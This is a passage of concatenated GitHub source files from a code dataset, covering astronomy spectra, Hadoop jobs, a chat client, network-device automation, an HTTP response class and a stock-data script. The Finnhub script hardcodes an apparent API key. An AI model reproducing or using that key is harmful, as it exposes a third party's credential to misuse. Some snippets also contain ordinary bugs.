('','_hires'):\n\n cubefn = paths.dpath('merge/fullcube_cutouts/{2}cutout_full_W51_7m12m_spw{0}{1}_lines.fits'\n .format(spw,suffix,sourcename))\n print(cubefn)\n\n spectra = spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate)\n\n for bins, (key, spectrum) in zip(bins_arcsec, spectra.items()):\n if hasattr(spectrum, 'beams'):\n include = np.isfinite(spectrum) & np.array([(bm.major < 1*u.arcsec) &\n (bm.minor < 1*u.arcsec)\n for bm in spectrum.beams])\n assert include.any()\n avg_beam = spectral_cube.cube_utils.average_beams(spectrum.beams,\n includemask=include)\n assert not np.isnan(avg_beam)\n spectrum.meta['beam'] = avg_beam\n spectrum.write(paths.merge_spath('{4}_radial_bin_{0:0.2f}to{1:0.2f}_7m12m_spw{2}{3}.fits'\n .format(bins[0], bins[1], spw,\n suffix, pfx)),\n overwrite=True\n )\n\n for spw in (0,1,2,3):\n\n cubefn = paths.dpath('12m/fullcube_cutouts/{1}cutout_full_W51_spw{0}_lines.fits'\n .format(spw, sourcename))\n print(cubefn)\n\n spectra = spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate)\n\n pl.figure(1).clf()\n\n for bins, (key, spectrum) in zip(bins_arcsec, spectra.items()):\n if hasattr(spectrum, 'beams'):\n include = np.isfinite(spectrum) & np.array([(bm.major < 1*u.arcsec) &\n (bm.minor < 1*u.arcsec)\n for bm in spectrum.beams])\n avg_beam = spectral_cube.cube_utils.average_beams(spectrum.beams,\n includemask=include)\n spectrum.meta['beam'] = avg_beam\n spectrum.write(paths.spath('{3}_radial_bin_{0:0.2f}to{1:0.2f}_spw{2}.fits'\n .format(bins[0], bins[1], spw, pfx)),\n overwrite=True\n )\n\n\n pl.plot(spectrum.spectral_axis.to(u.GHz).value, spectrum.value,\n label='{0:0.1f}-{1:0.1f}'.format(*bins))\n\n pl.xlabel(\"Frequency (GHz)\")\n pl.ylabel(\"Intensity (Jy)\")\n pl.gca().ticklabel_format(useOffset=False)\n pl.gca().get_xaxis().get_major_formatter().set_scientific(False)\n pl.gca().get_yaxis().get_major_formatter().set_scientific(False)\n \n pl.legend(loc='best')\n pl.savefig(paths.fpath('radial_spectra/{1}_radial_spectra_spw{0}.png'\n .format(spw, pfx)))\n","repo_name":"keflavich/W51_ALMA_2013.1.00308.S","sub_path":"analysis/radial_spectra.py","file_name":"radial_spectra.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"1456628420","text":"import sys\nimport os\ncode_dir = os.getenv(\"TRANSFOREST\")\nsys.path.append(code_dir+'/scripts/')\nfrom shell_helpers import *\nfrom encode import *\nfrom itertools import *\n\nclass Mapper(object):\n def __init__(self):\n self.shell = ShellRunner({})\n self.shell.make_local_tmp_dir()\n\n # transforest code directory\n self.shell.subs[\"TRANSFOREST\"] = os.getenv(\"TRANSFOREST\")\n \n self.shell.subs[\"PYTHON\"] = os.getenv(\"PYTHON\")\n\n self.shell.subs[\"TMP_FILE\"] = self.tmp_file = self.shell.tmpdir + \"forests\"\n \n \n def __call__(self, data):\n self.min_key = 1e90\n def get_vals():\n for key, value in data:\n self.min_key = min(self.min_key, key)\n print >>sys.stderr, \"key\", key\n print >> sys.stderr, value[0:10], value.split(\"\\t\", 1)[1][0:10]\n yield value\n\n tmp_handle = open(self.tmp_file, 'w')\n for l in decode(get_vals()):\n print >>sys.stderr, \"print\"\n print >>tmp_handle, l\n tmp_handle.close()\n \n # Oracle-ize the forst\n print >>sys.stderr, os.getenv(\"PYTHONPATH\")\n self.shell.call(\"export PYTHONPATH=%s;cd $TRANSFOREST; cat $TMP_FILE | $PYTHON $TRANSFOREST/Features/oracle.py -w $TRANSFOREST/example/config.ini --lm $TRANSFOREST/example/lm.3.sri --order 3 $LOCAL_TMPDIR/oracle\"% os.getenv(\"PPATH\"))\n\n # Add Features to oracle forst\n self.shell.call(\"export PYTHONPATH=%s;cd $TRANSFOREST; $PYTHON $TRANSFOREST/Features/add_features.py $LOCAL_TMPDIR/oracle $LOCAL_TMPDIR/oracle_features\"%os.getenv(\"PPATH\"))\n\n # Add features to the main sentence\n self.shell.call(\"export PYTHONPATH=%s;cd $TRANSFOREST; $PYTHON $TRANSFOREST/Features/add_features.py $TMP_FILE $LOCAL_TMPDIR/features\"%os.getenv(\"PPATH\"))\n\n for i,(l1,l2) in enumerate(izip(encode(self.shell.open(\"$LOCAL_TMPDIR/features\")),\n encode(self.shell.open(\"$LOCAL_TMPDIR/oracle_features\")))):\n yield int(l.split(\"\\t\",1)[0]), l1 + \"****\" + l2\n\n\ndef starter(program): \n program.addopt(\"cmdenv\",\"PYTHON=%s\"%os.getenv(\"PYTHON\"))\n program.addopt(\"cmdenv\",\"TRANSFOREST=%s\"%os.getenv(\"TRANSFOREST\"))\n program.addopt(\"cmdenv\",\"LD_LIBRARY_PATH=%s\"%os.getenv(\"LD_LIBRARY_PATH\"))\n program.addopt(\"cmdenv\",\"PPATH=%s\"%os.getenv(\"PYTHONPATH\"))\n \ndef runner(job): \n import dumbo\n dumbo.run(Mapper)\n\n\nif __name__ == \"__main__\":\n import dumbo\n dumbo.main(runner,starter)\n \n","repo_name":"srush/tf-fork","sub_path":"hadoop_scripts/oracle_parses.py","file_name":"oracle_parses.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"33953913098","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# imports###############\nimport json\nimport sys\n###############################\n\n\nclass NewsDataReader:\n def __init__(self, fromtxt, tocsv, number_of_lines=None, row_lines=None):\n\n self.number_of_lines = 1000000 # number of rows to read\n self.row_lines = 16 # number of lines containing one row\n self.fromtxt = fromtxt\n self.tocsv = tocsv\n\n # read a multiple lines in txt file and convert it to a dictionary in python\n def read_row(self, f):\n row = ''\n opens = 0\n\n while True:\n readed = f.readline()\n if ('{\\n' in readed) or ('\": {\\n' in readed):\n opens += 1\n if ('},\\n' in readed) or ('}\\n' in readed):\n opens -= 1\n\n row = row + readed\n\n if opens == 0:\n break\n try:\n row_json = json.loads(row)\n except Exception as e:\n print(row)\n raise e\n return row_json\n\n def read(self):\n # load txt file row by row and extract each row from json format, then converts to csv format\n with open(self.fromtxt, 'r') as f:\n with open(self.tocsv, 'w') as csvf:\n # create the csv writer\n row = self.read_row(f)\n\n for line_row in range(self.number_of_lines):\n try:\n row = self.read_row(f)\n # write a row to the csv file\n row = json.dumps(row) + '\\n'\n csvf.write(row)\n if line_row % 1000 == 0:\n print(line_row)\n\n except Exception as e:\n print(e)\n break\n\n\nif __name__ == '__main__':\n\n fromtxt = '../resources/ferdowsi-data/Spad/ferdowsi-data.txt'\n tocsv = '../resources/ferdowsi-data/Spad/out.log'\n if len(sys.argv) > 1:\n fromtxt = sys.argv[1]\n tocsv = sys.argv[2]\n\n reader = NewsDataReader(fromtxt=fromtxt, tocsv=tocsv)\n print(\"started\")\n reader.read()\n print(\"successfully was read\")\n","repo_name":"fahim1377/search-engine","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"35589578431","text":"import socket, threading\n\n\nHEADER_SIZE = 64\n\n\ndef send_text(sock: socket.socket, text: str):\n \"\"\"Send text to server.\"\"\"\n payload = text.encode('utf8')\n header = f'{len(payload):<{HEADER_SIZE}}'.encode('utf8')\n sock.sendall(header + payload)\n\ndef receive_text(sock: socket.socket) -> str:\n \"\"\"Receive text from server.\"\"\"\n header = sock.recv(HEADER_SIZE)\n while len(header) < HEADER_SIZE:\n header += sock.recv(HEADER_SIZE - len(header))\n payload_size = int(header.decode('utf8').strip())\n\n payload = sock.recv(payload_size)\n while len(payload) < payload_size:\n payload += sock.recv(payload - len(payload))\n return payload.decode('utf8')\n\ndef recv_loop(sock: socket.socket):\n \"\"\"Receive text from server.\"\"\"\n while True:\n text = receive_text(sock)\n if text == 'ping':\n continue\n print(text)\n\ndef main():\n \"\"\"Main function.\"\"\"\n \n username = input('Enter your username: ')\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(('localhost', 8888))\n\n # Start receiving loop\n threading.Thread(target=recv_loop, args=(sock,), daemon=True).start()\n\n user_input = ''\n while user_input != 'exit':\n user_input = input()\n send_text(sock, f'{username}: {user_input}')\n\n \n sock.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"waheedullahkhan001/chat-client","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"21141744382","text":"__author__ = 'Dave Wapstra <dwapstra@cisco.com>'\n\nimport re\n\nfrom unicon.plugins.nxos import NxosSingleRpConnectionProvider, NxosDualRpConnectionProvider\nfrom unicon.eal.dialogs import Dialog, Statement\nfrom unicon.plugins.nxos.utils import NxosUtils\nfrom unicon.plugins.generic.statements import more_prompt_handler\nfrom unicon.plugins.generic.patterns import GenericPatterns\n\nutils = NxosUtils()\ngeneric_patterns = GenericPatterns()\n\n\nclass Nxos7kSingleRpConnectionProvider(NxosSingleRpConnectionProvider):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # in case device is on a vdc, this should be updated.\n self.connection.current_vdc = None\n\n def establish_connection(self):\n super().establish_connection()\n con = self.connection\n m = con.spawn.match.last_match\n\n dialog = Dialog([\n Statement(pattern=generic_patterns.more_prompt,\n action=more_prompt_handler,\n loop_continue=True,\n trim_buffer=False),\n Statement(pattern=r'.+#\\s*$')\n ])\n\n hostname = m.groupdict().get('hostname00')\n if hostname and '-' in hostname:\n con.log.info('We may be on a VDC, checking')\n con.sendline('show vdc')\n dialog.process(con.spawn)\n vdc_info = con.spawn.match.match_output\n m = re.search(r'^1', vdc_info, re.MULTILINE)\n if m:\n con.log.info('Current VDC: Admin')\n else:\n m = re.search(r'^[2345678]\\s*(?P<vdc_name>\\S+)', vdc_info, re.MULTILINE)\n if m:\n vdc_name = m.groupdict()['vdc_name']\n con.log.info('Current VDC {}'.format(vdc_name))\n con.current_vdc = vdc_name\n con.hostname = con.hostname.replace('-' + vdc_name, '')\n vdc_hostname = con.hostname + '-' + vdc_name\n if con.is_ha:\n con.active.state_machine.hostname = vdc_hostname\n con.standby.state_machine.hostname = vdc_hostname\n else:\n con.state_machine.hostname = vdc_hostname\n\n\nclass Nxos7kDualRpConnectionProvider(NxosDualRpConnectionProvider):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # in case device is on a vdc, this should be updated.\n self.connection.current_vdc = None\n","repo_name":"CiscoTestAutomation/unicon.plugins","sub_path":"src/unicon/plugins/nxos/n7k/connection_provider.py","file_name":"connection_provider.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"57"} +{"seq_id":"1178751348","text":"# day22_part2.py\n\nfrom collections import Counter\nimport numpy as np\n\ninstructions = []\nxmagic = 0\nymagic = 0\nzmagic = 0\nreactor = None\n\ndef lit():\n global magic, reactor\n lit = 0\n for x in range(0, magic):\n for y in range(0, magic):\n for z in range(0, magic):\n lit = lit + reactor[x,y,z]\n return int(lit)\n\ndef correct_boundaries(b):\n global xmagic, ymagic, zmagic\n c = []\n c.append(b[0] + xmagic)\n c.append(b[1] + xmagic)\n c.append(b[2] + ymagic)\n c.append(b[3] + ymagic)\n c.append(b[4] + zmagic)\n c.append(b[5] + zmagic)\n return c\n\ndef convert_coord(d, x):\n global xmagic, ymagic, zmagic\n if d == 'x':\n return int(x) + xmagic\n elif d == 'y':\n return int(x) + ymagic\n elif d == 'z':\n return int(x) + zmagic\n \ndef parse_input_file(file): \n global instructions, xmagic, ymagic, zmagic, reactor\n \n # Max value pass\n xmin = 0\n ymin = 0\n zmin = 0\n f = open(file, \"r\")\n for line in f:\n l = line.rstrip('\\n')\n status, temp = l.split(' ')\n ranges = temp.split(',')\n boundaries = []\n for r in ranges:\n d, b = r.split('=')\n b = b.split('..')\n if d == 'x':\n xmin = int(b[0]) if int(b[0]) < xmin else xmin\n if d == 'y':\n ymin = int(b[0]) if int(b[0]) < ymin else zmin\n if d == 'z':\n zmin = int(b[0]) if int(b[0]) < zmin else zmin\n xmagic = 0 if xmin > 0 else abs(xmin)\n ymagic = 0 if ymin > 0 else abs(ymin)\n zmagic = 0 if zmin > 0 else abs(zmin)\n f.close()\n\n # Fix reactor\n reactor = np.zeros([xmagic, ymagic, zmagic], bool) # to represent -50..50 in each axis\n\n # Import pass\n f = open(file, \"r\")\n for line in f:\n l = line.rstrip('\\n')\n status, temp = l.split(' ')\n ranges = temp.split(',')\n boundaries = []\n for r in ranges:\n d, b = r.split('=')\n b = b.split('..')\n boundaries.append(convert_coord(d, b[0]))\n boundaries.append(convert_coord(d, b[1]))\n boundaries = correct_boundaries(boundaries)\n if boundaries:\n instructions.append([1 if status == 'on' else 0, boundaries])\n f.close()\n\ndef print_reactor():\n global reactor\n print(f'--------------------')\n print(f'INFO > Reactor:')\n print(reactor)\n print(f'--------------------')\n print(f'')\n return\n \ndef main(file):\n\n global instructions, reactor\n\n # Import input data\n parse_input_file(file)\n print(instructions)\n print(reactor)\n\n for c, i in enumerate(instructions):\n status, affected = i\n print(f'Step {c}...')\n for x in range(affected[0], affected[1] + 1):\n for y in range(affected[2], affected[3] + 1):\n for z in range(affected[4], affected[5] + 1):\n reactor[x, y, z] = status\n \n # Cleanup\n print_reactor()\n print(f'Number of lit pixels: {lit()} (should be 590784)')\n print(\"Done!\")\n\n\n# main('tiniest.txt')\nmain('tiny.txt')\n# main('test.txt')\n# main('new_test.txt')\n# main('input.txt')\n","repo_name":"jhempy/advent-of-code-2021","sub_path":"Day22/day22_part2.py","file_name":"day22_part2.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70461740020","text":"import string\nimport random\nfrom typing import List\nfrom unittest import TestCase\n\nfrom app.dto.pipeline.icd10_annotation import ICD10Annotation\nfrom app.dto.pipeline.icd10_annotation_result import ICD10AnnotationResult\nfrom app.util.span_merger_util import SpanMergerUtil\n\n\nclass TestSpanMergerUtil(TestCase):\n def test__get_icd_10_codes_with_relevant_spans__should_return_correct_response__given_correct_input(self):\n mock_icd10_annotations = self.__get_dummy_icd10_annotation_result()\n no_of_components_in_algorithm = 3\n\n # printing lowercase\n letters = string.ascii_lowercase\n mock_medant_note = ''.join(random.choice(letters) for _ in range(1000))\n\n icd10_filtered_annotations = SpanMergerUtil.get_icd_10_codes_with_relevant_spans(mock_icd10_annotations,\n no_of_components_in_algorithm,\n mock_medant_note)\n\n\n assert icd10_filtered_annotations[0].begin_offset == 0\n assert icd10_filtered_annotations[0].end_offset == 7\n\n assert icd10_filtered_annotations[1].begin_offset == 8\n assert icd10_filtered_annotations[1].end_offset == 10\n\n assert icd10_filtered_annotations[2].begin_offset == 50\n assert icd10_filtered_annotations[2].end_offset == 130\n\n assert icd10_filtered_annotations[3].begin_offset == 300\n assert icd10_filtered_annotations[3].end_offset == 900\n\n assert icd10_filtered_annotations[3].suggested_codes[0].code == 'A15.0'\n assert icd10_filtered_annotations[3].suggested_codes[1].code == 'J12.89'\n assert icd10_filtered_annotations[3].suggested_codes[2].code == 'A15.9'\n\n assert icd10_filtered_annotations[0].medical_condition == mock_medant_note[0:7]\n assert icd10_filtered_annotations[1].medical_condition == mock_medant_note[8:10]\n assert icd10_filtered_annotations[2].medical_condition == mock_medant_note[50:130]\n assert icd10_filtered_annotations[3].medical_condition == mock_medant_note[300:900]\n\n\n def __get_dummy_icd10_annotation_result(self) -> List[ICD10AnnotationResult]:\n icd10_annotation_1 = ICD10Annotation(code=\"A15.0\", description=\"Tuberculosis of lung\", score=0.7)\n icd10_annotation_2 = ICD10Annotation(code=\"A15.9\", description=\"Respiratory tuberculosis unspecified\",\n score=0.54)\n icd10_annotation_result_1 = ICD10AnnotationResult(medical_condition=\"Tuberculosis\", begin_offset=600,\n end_offset=900, is_negated=False,\n suggested_codes=[icd10_annotation_1, icd10_annotation_2],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_3 = ICD10Annotation(code=\"A15.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_4 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_2 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=460,\n end_offset=700,\n is_negated=False,\n suggested_codes=[icd10_annotation_3, icd10_annotation_4],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_5 = ICD10Annotation(code=\"A15.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_6 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_3 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=300,\n end_offset=500,\n is_negated=False,\n suggested_codes=[icd10_annotation_5, icd10_annotation_6],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_7 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_8 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_4 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=70,\n end_offset=130,\n is_negated=False,\n suggested_codes=[icd10_annotation_7, icd10_annotation_8],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_9 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_10 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_5 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=60,\n end_offset=120,\n is_negated=False,\n suggested_codes=[icd10_annotation_9, icd10_annotation_10],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_11 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_12 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_6 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=50,\n end_offset=100,\n is_negated=False,\n suggested_codes=[icd10_annotation_11, icd10_annotation_12],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_13 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_14 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_7 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=0, end_offset=7,\n is_negated=False,\n suggested_codes=[icd10_annotation_13, icd10_annotation_14],\n raw_acm_response={\"data\": \"data\"})\n\n icd10_annotation_15 = ICD10Annotation(code=\"J12.0\", description=\"Adenoviral pneumonia\", score=0.89)\n icd10_annotation_16 = ICD10Annotation(code=\"J12.89\", description=\"Other viral pneumonia\",\n score=0.45)\n\n icd10_annotation_result_8 = ICD10AnnotationResult(medical_condition=\"pneumonia\", begin_offset=8, end_offset=10,\n is_negated=False,\n suggested_codes=[icd10_annotation_15, icd10_annotation_16],\n raw_acm_response={\"data\": \"data\"})\n\n return [icd10_annotation_result_1, icd10_annotation_result_2, icd10_annotation_result_3, # 300 - 500, 360 - 600, 370 - 700\n icd10_annotation_result_4, icd10_annotation_result_5, icd10_annotation_result_6, # 300 - 500, 360 - 600, 550 - 700\n icd10_annotation_result_7, icd10_annotation_result_8] # 0 - 7, 8 - 10\n","repo_name":"akm-sabbir/Tracking_Changes_in_text","sub_path":"tests/util/test_span_merger_util.py","file_name":"test_span_merger_util.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"23642605105","text":"from C1_LinkedList.LNode import LNode\n\n\ndef recursive_remove_dup(head):\n if head.next is None:\n return head\n pre = head\n head.next = recursive_remove_dup(head.next)\n pointer = head.next\n while pointer is not None:\n if head.data == pointer.data:\n pre.next = pointer.next\n pointer = pre.next\n else:\n pointer = pointer.next\n pre = pre.next\n return head\n\ndef remove_dup(head):\n if head is None:\n return\n head.next = recursive_remove_dup(head.next)\n\nif __name__ == '__main__':\n i = 1\n head=LNode()\n tmp=None\n cur=head\n while i<2:\n tmp=LNode()\n if i%2==0:\n tmp.data=i+1\n elif i%3==0:\n tmp.data=i-2\n else:\n tmp.data=i\n tmp.next=None\n cur.next=tmp\n cur=tmp\n i+=1\n print(\"删除前:\")\n cur = head.next\n while cur is not None:\n print(cur.data)\n cur = cur.next\n remove_dup(head)\n print(\"删除后:\")\n cur = head.next\n while cur is not None:\n print(cur.data)\n cur = cur.next","repo_name":"xSandie/python_data_structure","sub_path":"C1_LinkedList/remove_dup_1_2/RecursiveDelete.py","file_name":"RecursiveDelete.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28614811861","text":"import base64\nimport datetime\nimport hashlib\nimport http\nimport time\n\nfrom collections import OrderedDict\nfrom http import HTTPStatus\n\nfrom strix import utils\n\n\nclass HTTPResponse():\n def __init__(self, context=\"\"):\n self.all_http_status = self._get_all_http_status()\n self.headers = {}\n self.context = context\n self.content = \"\"\n self.status_line = \"\"\n self._cookie = http.cookies.SimpleCookie()\n self._status_code = HTTPStatus.OK.value\n self._reason_phrase = HTTPStatus.OK.name\n self._version = \"HTTP/1.1\"\n\n def _get_all_http_status(self):\n all_http_status = dict(((http_status.value, http_status.phrase) for http_status in list(http.HTTPStatus)))\n return all_http_status\n\n def set_cookie(self, name, value, domain=None, expires=None, path=\"/\", expires_days=None, **kwargs):\n if not hasattr(self, \"_cookie\"):\n self._cookie = http.cookies.SimpleCookie()\n if name in self._cookie:\n del self._new_cookie[name]\n self._cookie[name] = value\n morsel = self._cookie[name]\n if domain:\n morsel[\"domain\"] = domain\n if expires_days is not None and not expires:\n expires = datetime.datetime.utcnow() + datetime.timedelta(\n days=expires_days)\n if expires:\n expires = expires.timestamp()\n morsel[\"expires\"] = utils.format_timestamp(expires)\n if path:\n morsel[\"path\"] = path\n for k, v in kwargs.items():\n if k == 'max_age':\n k = 'max-age'\n\n # skip falsy values for httponly and secure flags because\n # SimpleCookie sets them regardless\n if k in ['httponly', 'secure'] and not v:\n continue\n\n morsel[k] = v\n\n def set_secure_cookie(self, name, value, domain=None, expires=None, path=\"/\", expires_days=14, **kwargs):\n cookie_secret = kwargs.get(\"cookie_secret\", \"\")\n if cookie_secret:\n self.set_cookie(name, gen_signed_cookie_value(value, expires_days, cookie_secret))\n else:\n pass\n\n def clear_cookie(self, name, path=\"/\", domain=None):\n \"\"\"Deletes the cookie with the given name.\n\n Due to limitations of the cookie protocol, you must pass the same\n path and domain to clear a cookie as were used when that cookie\n was set (but there is no way to find out on the server side\n which values were used for a given cookie).\n \"\"\"\n expires = datetime.datetime.utcnow() - datetime.timedelta(days=365)\n self.set_cookie(name, value=\"\", path=path, expires=expires,\n domain=domain)\n\n def set_header(self, name, value):\n self.headers[name] = value\n\n def set_status_line(self, version, http_status=HTTPStatus.OK):\n status_line_parts = {\"version\": version,\n \"status_code\": http_status.value,\n \"reason_phrase\": http_status.name}\n self.status_line = \"{version} {status_code} {reason_phrase}\\r\\n\".format(**status_line_parts)\n return self.status_line\n\n def set_version(self, version):\n self._version = version\n\n def set_status(self, status=HTTPStatus.OK):\n self._status_code = status.value\n self._reason_phrase = status.name\n\n def _get_status_line(self):\n if self._version is None:\n self._version = \"HTTP/1.1\"\n return \"{} {} {}\\r\\n\".format(*(self._version, self._status_code, self._reason_phrase))\n\n def _set_content(self, content):\n self.content = content\n\n @property\n def header_fields(self):\n headers = self.headers\n cookies = self._cookie\n headers[\"DATE\"] = utils.format_timestamp(time.time())\n headers[\"Content-Length\"] = len(self.message_body)\n headers = [\"{}: {}\".format(header, value) for header, value in headers.items()]\n if cookies:\n headers.append(cookies.output())\n headers = \"\\r\\n\".join(headers)\n return headers\n\n @property\n def message_body(self):\n if not self.context:\n self.context = \"HTTP {}: {}\\n\".format(self._status_code, self._reason_phrase)\n if self.content:\n self.context += self.content\n return self.context\n\n @property\n def body(self):\n status_line = self._get_status_line()\n resp_parts = {\"status_line\": status_line,\n \"header_fields\": self.header_fields,\n \"message_body\": self.message_body}\n response_data = \"{status_line}{header_fields}\\r\\n\\r\\n{message_body}\\r\\n\".format(**resp_parts)\n return response_data.encode()\n\n def redirect(self, url, permanent=False, status=None):\n \"\"\"Sends a redirect to the given (optionally relative) URL.\n \n If the ``status`` argument is specified, that value is used as the\n HTTP status code; otherwise either 301 (permanent) or 302\n (temporary) is chosen based on the ``permanent`` argument.\n The default is 302 (temporary).\n \"\"\"\n # if self._headers_written:\n # raise Exception(\"Cannot redirect after headers have been written\")\n if status is None:\n status = HTTPStatus.MOVED_PERMANENTLY if permanent else HTTPStatus.FOUND\n # else:\n # assert isinstance(status, int) and 300 <= status <= 399\n self.set_status(status)\n self.set_header(\"Location\", url)\n\n\ndef gen_signed_cookie_value(value, expires_days, cookie_secret=\"\"):\n now = datetime.datetime.now()\n expires_date = now + datetime.timedelta(days=expires_days)\n ts = int(expires_date.timestamp())\n msg = \"{}{}{}\".format(str(value), str(ts), cookie_secret)\n sign = hashlib.sha1(msg.encode()).hexdigest()\n raw_cookie_value = \"{}:{}:{}\".format(value, ts, sign)\n cookie_value = base64.b64encode(raw_cookie_value.encode())\n return cookie_value.decode()\n","repo_name":"Youxun-Zh/strix","sub_path":"strix/httplib/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71237337460","text":"import pandas as pd\nimport finnhub\nimport time\nfrom datetime import datetime, timedelta\n\n# Setup client\nfinnhub_client = finnhub.Client(api_key='cib4151r01qvsha5qnc0cib4151r01qvsha5qncg')\n\n# Define a function to get the data\ndef get_data(symbol):\n # Get company profile 2 for market cap\n profile = finnhub_client.company_profile2(symbol=symbol)\n market_cap = profile['marketCapitalization']\n\n # Get quote for previous close and open price\n quote = finnhub_client.quote(symbol)\n prev_close = quote['pc']\n open_price = quote['o']\n\n # Get basic financials for PE ratio and EPS\n financials = finnhub_client.company_basic_financials(symbol, 'all')\n pe_ratio = financials['metric']['peNormalizedAnnual']\n eps = financials['metric']['epsNormalizedAnnual']\n\n # Get stock candles for average volume calculation over past 10 days\n today = datetime.today()\n ten_days_ago = today - timedelta(days=10)\n res_10_days = finnhub_client.stock_candles(symbol, 'D', int(ten_days_ago.timestamp()), int(today.timestamp()))\n df_10_days = pd.DataFrame(res_10_days)\n average_volume = df_10_days['v'].mean()\n prev_volume = df_10_days['v'].iloc[-2] if len(df_10_days) > 1 else None\n\n # Get today's volume\n res_today = finnhub_client.stock_candles(symbol, '1', int((today - timedelta(days=1)).timestamp()), int(today.timestamp()))\n df_today = pd.DataFrame(res_today)\n today_volume = df_today['v'].sum() if not df_today.empty else 0\n\n # Get stock candles for calculating daily returns\n res = finnhub_client.stock_candles(symbol, 'D', int(ten_days_ago.timestamp()), int(today.timestamp()))\n df_candles = pd.DataFrame(res)\n df_candles['t'] = pd.to_datetime(df_candles['t'], unit='s')\n df_candles.set_index('t', inplace=True)\n df_candles['returns'] = df_candles['c'].pct_change()\n\n # Calculate volatility and Sharpe Ratio\n risk_free_rate = 0.02 # Assuming risk-free rate of 2%\n volatility = df_candles['returns'].std() * (252 ** 0.5) # Assuming 252 trading days in a year\n sharpe_ratio = (df_candles['returns'].mean() - risk_free_rate) / df_candles['returns'].std() * (252 ** 0.5) if df_candles['returns'].std() != 0 else 0\n\n return [symbol, prev_close, open_price, prev_volume, today_volume, average_volume, market_cap, pe_ratio, eps, volatility, sharpe_ratio]\n\n\nif __name__ == '__main__':\n\t# List of symbols to get data for\n\tsymbols = ['AAPL', 'MSFT', 'GOOG']\n\n\t# Fetch the data\n\tdata = [get_data(symbol) for symbol in symbols]\n\n\t# Convert to DataFrame and write to CSV\n\tdf = pd.DataFrame(data, columns=['Symbol', 'Previous Close', 'Open Price', 'Prev Day Volume', 'Today Volume', 'Avg Volume (10 days)', 'Market Cap', 'PE Ratio (ttm)', 'EPS (ttm)', 'Volatility', 'Sharpe Ratio'])\n\tdf = df.round(2)\n\tdf.to_csv('stock_data.csv', index=False)\n","repo_name":"yifeng-yu/quant-trading","sub_path":"quant_server.py","file_name":"quant_server.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16112563494","text":"import turtle\nimport random\nimport tkinter as tk\n\n# Ustawienia ekranu\nszerokosc = 800\nwysokosc = 600\n\n# Inicjalizacja ekranu\nekran = turtle.Screen()\nekran.title(\"Żółw na drodze\")\nekran.setup(szerokosc, wysokosc)\nekran.bgcolor(\"green\")\n\n# Tworzenie żółwia\nzolw = turtle.Turtle()\nzolw.shape(\"turtle\")\nzolw.color(\"white\")\nzolw.penup()\nzolw.goto(0, -wysokosc/2 + 30)\nzolw.setheading(90)\n\n# Tworzenie samochodów\nsamochody = []\nkolory_samochodow = [\"red\", \"blue\", \"orange\", \"yellow\", \"purple\", \"green\"]\npredkosc_samochodu = 5\n\nfor _ in 